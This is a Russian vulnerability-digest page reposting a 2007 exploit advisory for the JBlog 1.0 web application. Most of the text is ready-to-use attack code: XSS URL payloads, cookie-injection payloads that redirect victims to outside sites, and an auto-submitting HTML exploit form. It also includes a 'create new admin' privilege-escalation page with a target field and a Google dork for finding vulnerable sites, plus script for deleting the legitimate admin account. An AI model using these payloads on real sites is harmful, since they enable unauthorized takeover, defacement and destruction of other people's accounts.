Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

[MajorSecurity Advisory #51]Virtual Hosting Control System - Session fixation Issue

[Aria-Security] Munch Pro Remote Login ByPass

[Aria-Security] Property Pro Remote Login ByPass

UseBB 1.0.x  Cross Site Scripting (XSS)

From:	s4mi_(at)_LinuxMail.org <s4mi_(at)_LinuxMail.org>
Date:	22 июля 2007 г.
Subject:	JBlog 1.0 Creat Admin exploit, xss, Cookie Manipulation

<!--
##############################################################################
#       Script...............: JBlog version: 1.0                            #
#       Script Site..........: http://www.jmuller.net/jblog                  #
#       Vulnerability........: Creat Admin exploit, xss, Cookie Manipulation #
#       Access...............: Remote                                        #
#       level................: Dangerous                                     #
#       Author...............: S4mi                                          #
#       Contact..............: S4mi[at]LinuxMail.org                         #
#                                                                            #
##############################################################################

cookies Manipulation + Cross Site Scripting :
=========================================================================
xss:
----
http://site.com/jblog/index.php?id=">[xss Here]&pcomm=com

cookies Manipulation:
--------------------
The POST variable 'search' in  /jblog/recherche.php  also The Cookie variable 'theme' is affected and can be set to :

<meta http-equiv='Set-cookie' content='name=value'>

also we can do this :

<meta http-equiv='Set-cookie' content='theme=<body+onload=alert("owned_by_Hacker")>
'>

or :

<meta http-equiv='Set-cookie' content='theme=<body+onload=document.location="ss="fixed">http://Bad.site.com/">'>

This is a small exemple of Inject Cookie Xploit (Cookie Manipulation)
---------------------------------------------------------------------------
<html>
<head>
<title>Inject Cookie Xploit By S4mi</title>
</head>
<body>
<script language="JavaScript">
function JBlogxpl()
{
 document.xploit.action=document.xploit.victim.value;
 document.xploit.submit();
}
</script>
<form name="xploit"  method="post" action="">
<input type="hidden" name="victim" value="http://victim/jblog/recherche.php">
<input type="hidden"  name="search" value="&lt;meta http-equiv='Set-cookie' content='theme=&lt;body+onload=document.location=&quot;http://milw0rm.com/&quot;&gt;'&gt;" />
<script>document.location="javascript: JBlogxpl()"</script>
</form>
</body>
</html>

============================================================================

Remote Privilege Escalation "Creat New Admin Xploit" By S4mi :
============================================================================
-->

<html>
<title>JBlog 1.0 -- Remote Privilege Escalation (Creat admin sploit) -- By S4mi</title>
<body>
<script language="JavaScript">
function JBlogxpl() {
 if (document.xploit.victim.value=="") {
   alert("Please enter target!");
   return false;
 }
{
   xploit.action="http://"+document.xploit.victim.
value+"admin/ajoutaut.php";
   xploit.mot.value=document.xploit.mot.value;
   xploit.droit.value=document.xploit.droit.value;
   xploit.submit();
 }
}

</script>
<strong><p>
---------------------------------------------------------------------------------
----------<br>
 #JBlog 1.0 -- Remote Privilege Escalation Xploit (add user)<br>
 #     Discovered By...............: S4mi                                          <br>
 #     Contact..........................: S4mi[at]LinuxMail.org<br>
 #<br>
 #     Google Dork : "propulsй par JBlog"  <br>
 --------------------------------------------------------------------------------
------------</p>
<form name="xploit" method="POST" onSubmit="JBlogxpl();">
 Target -> Http://
   <input type="text" name="victim" value="www.Site.com/Path/" size="44">
 <p> Username.......->
   <input type="text" name="mot" value="ZaZ" size="30">
   (your password will be by default: <i>"admin"</i>)</p>
 <p> User type......->
           <select name="droit">
                   <option value="3">Admin</option>
                   <option value="2">Moderator</option>
                   <option value="1">Editor</option>
           </select>
 </p>
 <p>Submit...........->
   <input name="submit" type="submit" value="   Xploit it       ">
 </p>
</form>
<br>-----------------------------------------------------------------------
----------------<br>
 #NB : Remember do not  use a probably existing username (such as "admin"). <br>
 #If you want to Delete real admin account :D login into your New Created admin account & use this :<br>
---------------------------------------------------------------------------------
-----------<p>
<script language="JavaScript">

function AdminDelete()
{ if (document.xploit.victim.value=="") {
   alert("Please enter target!");
   return false;
 }
        if(confirm('Are you Sure!! want really DELETE user ?'))
       document.location.href="http://"+document.xploit.victim.
value+"admin/supauteur.php?cat="+document.userdel.id.value;
}
</script>
<form name="userdel" method="POST" onSubmit="">
ID...............> <input type="text" name="id" value="1" size="3">
</form>
<a href="#" OnClick="AdminDelete()"/>Delete</a>

<br>-----------------------------------------------------------------------
------------------------<br>
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39, Black-Code, Nuck3r... & all who know Me!

</body>
</html>